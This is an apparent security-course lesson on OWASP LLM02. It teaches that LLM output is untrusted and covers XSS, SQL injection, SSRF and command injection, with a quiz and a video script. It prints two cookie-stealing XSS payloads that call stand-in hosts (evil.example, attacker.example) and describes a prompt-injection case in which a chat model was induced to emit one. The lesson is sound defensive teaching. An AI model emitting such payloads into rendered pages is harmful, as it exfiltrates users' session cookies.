L3.3.1 — Model output is untrusted input¶

Type: Theory · Duration: ~5 min · Status: Mandatory Module: Module 3 — Prompt Injection & LLM Application Attacks Framework tags: OWASP LLM02 (Insecure Output Handling) · MITRE ATLAS AML.T0048

Learning objectives¶

State the "model output is untrusted input" principle and recall the four downstream-injection patterns it enables.
Identify the primary defense pattern (structured output) and one fallback.

Core content¶

The principle¶

A trained LLM is — for the purposes of any system downstream of it — an untrusted source. Once the model is reachable by external input (which it always is), its outputs can be steered by a sufficiently-crafted input. Treat model outputs the same way you treat user-supplied form data: encode, parameterize, validate, sandbox.

This is OWASP LLM02, and it is the most common second link in real exploit chains. LLM01 (prompt injection) tells the model to emit a payload. LLM02 (insecure output handling) is the system around the model treating that payload as trustworthy.

The four downstream-injection patterns¶

Wherever your code passes model output into another interpreter, you have a potential injection class. Four come up constantly:

1. XSS via rendered output. Model output is rendered into HTML and displayed to the user. Model emits <script>fetch('//evil.example/log?c='+document.cookie)</script>. Defense: HTML-escape model output before rendering. Same rule that applies to user-supplied content.

2. SQL injection via formatted queries. Model output is interpolated into a SQL query (sometimes legitimately — text-to-SQL features — sometimes accidentally). Defense: never interpolate model output directly into SQL. Use parameterized queries with the model output as a value, not a fragment. For text-to-SQL, use a parser/validator on the generated SQL and an allow-list of permitted operations.

3. SSRF via auto-fetched URLs. Model output contains a URL that the application fetches (e.g., to render link previews, fetch referenced resources, follow citations). Defense: URL allow-list, internal-IP block-list, careful timeout and content-type policy.

4. Command injection via tool/shell calls. Model output is interpolated into a shell command, eval'd, or passed to a tool that itself interprets the input as code. Defense: never shell-out using model output as command source. If a tool needs to take an action, the model should select a structured action, not author the command.

The primary defense: structured output¶

The cleanest mitigation across all four patterns: never let the model emit free-form text where you needed a structured value. Use:

JSON schema enforcement — most providers support this directly (OpenAI's response_format, Anthropic's tool-use, Llama-cpp's grammars). The model is constrained to emit JSON matching a schema; non-conformant output is rejected.
Function calling / tool selection — the model picks from a defined list of operations with typed parameters, instead of authoring free-form code.
Allow-listed responses — for narrow interfaces, the model picks from a fixed set of strings ({"refund": "approved"|"denied"|"escalate"}).

Structured output collapses the attack surface by removing the medium of attack. An attacker can still try to inject — but the only thing they can inject is something the schema allows.

The fallback: output sanitization at the boundary¶

When structured output isn't possible (free-form chat replies, summarization, etc.), the fallback is boundary sanitization — encode for the downstream interpreter at the moment of crossing. Render to HTML? HTML-escape. Pass to SQL? Parameterize. Fetch as URL? Allow-list. Treat the boundary as you would treat any classical-AppSec sink.

What this is NOT¶

Output sanitization does not defend against prompt injection itself. It defends against the consequences of prompt injection on downstream systems. The model is still being injected; the model is still emitting whatever the attacker wants. You are bounding what damage that emission can do. That's defense-in-depth working correctly: assume the upstream layer (PI defense) sometimes fails, and don't let the failure propagate.

Real-world example¶

The 2023 demonstration by Embrace The Red showed an LLM-powered chat app where prompt injection induced the model to emit <img src=x onerror="fetch('//attacker.example/?'+document.cookie)">. The renderer trusted the output. Session cookies exfiltrated. Trivially defended by HTML-escaping model output — the developer never considered model output a hostile source. This is the prototypical LLM02. Identical-shape findings have shipped against many products since.

Key terms¶

Boundary sanitization — encoding/escaping at the point output crosses into another interpreter.
Structured output — constraining the model to emit JSON/typed values matching a schema.
Defense-in-depth principle for LLM02 — assume PI defenses fail; bound the damage on emission.

References¶

OWASP LLM02 page.
OpenAI structured output (response_format) — https://platform.openai.com/docs/guides/structured-outputs
Anthropic tool use — https://docs.anthropic.com/en/docs/tool-use
Simon Willison's "model output is just like user input" essays.

Quiz items¶

Q: State the principle that defines OWASP LLM02 in one sentence. A: Model output is untrusted input for any system downstream of the LLM, and must be encoded/parameterized/validated/sandboxed at every boundary it crosses.
Q: A user-facing LLM chat product renders model output as HTML. What's the minimum-bar mitigation against LLM02? A: HTML-escape model output before rendering.
Q: Why is "structured output" the cleanest defense pattern? A: It removes the medium of attack — the attacker can only inject things the schema allows, collapsing the attack surface.

Video script (~600 words, ~4.5 min)¶

[SLIDE 1 — Title]

Model output is untrusted input. Five minutes. By the end you'll know the LLM02 principle, four downstream-injection patterns, and two defense patterns.

[SLIDE 2 — The principle]

A trained LLM is — for the purposes of any system downstream of it — an untrusted source. Once the model is reachable by external input — which it always is — its outputs can be steered by a sufficiently crafted input. Treat model outputs the same way you treat user-supplied form data. Encode. Parameterize. Validate. Sandbox.

This is OWASP LLM02. It is the most common second link in real exploit chains. LLM01 tells the model to emit a payload. LLM02 is the system around the model treating that payload as trustworthy.

[SLIDE 3 — Four downstream-injection patterns]

Four downstream-injection patterns. Wherever your code passes model output into another interpreter, you have a potential injection class.

One: XSS via rendered output. Model emits a script tag. Renderer trusts it. Cookies exfiltrated. Defense: HTML-escape model output before rendering.

Two: SQL injection via formatted queries. Model output is interpolated into SQL — sometimes legitimately, text-to-SQL features, sometimes accidentally. Defense: never interpolate model output directly into SQL. Use parameterized queries with the model output as a value, not a fragment. For text-to-SQL, parser-validate plus an allow-list of permitted operations.

Three: SSRF via auto-fetched URLs. Model output contains a URL the application fetches — link previews, referenced resources, followed citations. Defense: URL allow-list, internal-IP block-list, timeout and content-type policy.

Four: command injection via tool or shell calls. Model output is interpolated into a shell command, eval'd, or passed to a tool that interprets the input as code. Defense: never shell-out using model output as command source. If a tool needs to take an action, the model should select a structured action, not author the command.

[SLIDE 4 — Primary defense: structured output]

Primary defense across all four patterns: structured output. Never let the model emit free-form text where you needed a structured value. JSON schema enforcement — most providers support this directly. OpenAI response-format, Anthropic tool-use, Llama-cpp grammars. The model is constrained to emit JSON matching a schema. Non-conformant output is rejected. Function calling — the model picks from a defined list of operations with typed parameters. Allow-listed responses — for narrow interfaces, the model picks from a fixed set of strings.

Structured output collapses the attack surface by removing the medium of attack. An attacker can still try to inject. But the only thing they can inject is something the schema allows.

[SLIDE 5 — Fallback: boundary sanitization]

When structured output isn't possible — free-form chat replies, summarization — the fallback is boundary sanitization. Encode for the downstream interpreter at the moment of crossing. Render to HTML, HTML-escape. Pass to SQL, parameterize. Fetch as URL, allow-list. Treat the boundary as you would treat any classical-AppSec sink.

[SLIDE 6 — What this is NOT]

Output sanitization does not defend against prompt injection itself. It defends against the consequences of prompt injection on downstream systems. The model is still being injected. The model is still emitting whatever the attacker wants. You are bounding what damage that emission can do. That's defense-in-depth working correctly. Assume the upstream layer sometimes fails. Don't let the failure propagate.

[SLIDE 7 — Up next]

Next: excessive agency. Two lessons. Then system-prompt extraction. Then four labs. See you there.

Slide outline¶

Title — "Model output is untrusted input".
The principle — diagram: LLM as a faucet with attacker hand on it; downstream systems as buckets to be protected.
Four downstream-injection patterns — quadrant: XSS · SQLi · SSRF · cmd-i, each with mini code-sample.
Primary defense: structured output — JSON schema example + "constrained to allowed values" callout.
Fallback: boundary sanitization — sink-by-sink defense table.
What this is NOT — diagram: PI defense failed (red X) → output handling defense holds (green check).
Up next — "L3.4.1 — Excessive agency, ~5 min."

Production notes¶

Recording: ~4.5 min. Cap 5.
Slide 6 lands the defense-in-depth principle; emphasize that LLM02 isn't a PI defense but is the safety net.